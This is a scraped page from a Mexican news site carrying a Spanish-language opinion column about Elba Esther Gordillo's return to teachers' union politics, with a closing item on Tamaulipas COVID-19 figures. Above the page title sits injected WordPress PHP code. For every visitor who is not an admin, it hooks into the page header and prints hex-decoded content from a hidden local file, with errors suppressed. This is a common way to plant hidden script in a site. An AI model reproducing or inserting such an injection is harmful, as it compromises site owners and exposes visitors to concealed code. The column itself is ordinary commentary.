if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Tírenle al negrito – Reporte Noreste
Conéctate con nosotros

Opinión

Tírenle al negrito

Tírenle al negrito

La maestra Elba Esther Gordillo Morales está de regreso por culpa del Estado mexicano que sigue teniendo un modelo educativo efímero, con escuelas abandonadas, maestros de rodillas y amordazados acumulando un rezago de más de 20 millones de infanti-juveniles sin educación y de más de 4 millones de adultos sin educación superior; sí, puros mexicanos condenados a la ignorancia. 

Hace un par de semanas Grupo Reforma difundió una entrevista videograbada a la ex líder magisterial que presume ser una mujer congruente, y como siempre, frontal, declarando abiertamente estar de vuelta, porque sus compañeros están en una situación de marginalidad, sin participación en la agenda pública, pero con un Gobierno Federal obradorista en la intención de ejecutar el plan maestro que Manuel Barlett Díaz como titular de Educación en 1992 tenía en su escritorio, refiriéndose al proyecto de pulverizar el Sistema Nacional de Educación siendo subordinado del entonces presidente de México Carlos Salinas de Gortari.

“Una estrategia de: Descentralización. Sin entender la pluralidad lo cosmogónico, los diferentes Méxicos que hay en la República. Entonces dejarle la escuela al amparo sólo de la comunidad sin los recursos suficientes y creer que cada escuela resolviera sus temas y perder la autonomía del Estado, pues no estábamos de acuerdo”, dice Elba Esther en esa entrevista que no debe perderse. 

Durante una de las intervenciones de la maestra, el diálogo parece tomar un matiz cómico cuando asevera que Leticia Ramírez, actual secretaria de Educación Pública, le da pena; Gordillo Morales evidentemente no tiene miedo a enfrentarse nuevamente al Sistema que la vio nacer, crecer e intentó verla morir. 

Es curioso como lo que en su momento hace más de 30 años llegó a reclamar como líder magisterial, en el presente, sigan siendo los mismos conflictos: más salarios, mejores condiciones en infraestructura educativa y una fuerte demanda de padres y maestros por un mejor sistema educativo. Ese polvorín ya lo conoce la maestra Elber Esther Gordillo, no le espanta y con un magisterio pisoteado ante un nulo reconocimiento, considera que es el momento de volver a alzar la voz, al fin, Manuel Barlett y Marcelo Ebrard ya la conocen, ambos han “negociado” con ella en trincheras opositoras. 

No se pierda la entrevista, es un deleite escuchar a la maestra decir las cosas aparentemente sin miedo. 

En la intimidad…  A la madre con la gente de Padilla, Soto la Marina y Llera que siguen en rojo del semaforo COVID-19; El Mante y Abasolo estan en amarillo, mientras que a excepción de Altamira, Madero y Tampico que son naranjas, el resto de Tamaulipas pinta color verde con un dinamismo de 6 nuevos casos en las últimas 24 horas y un total de 178 mil 154 casos acumulados durante todo este amargo tiempo en el que han muerto 8 mil 18 personas.

A lavarse las manos y no confiarse. 

davidcastellanost@hotmail.com
@dect1608

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Opinión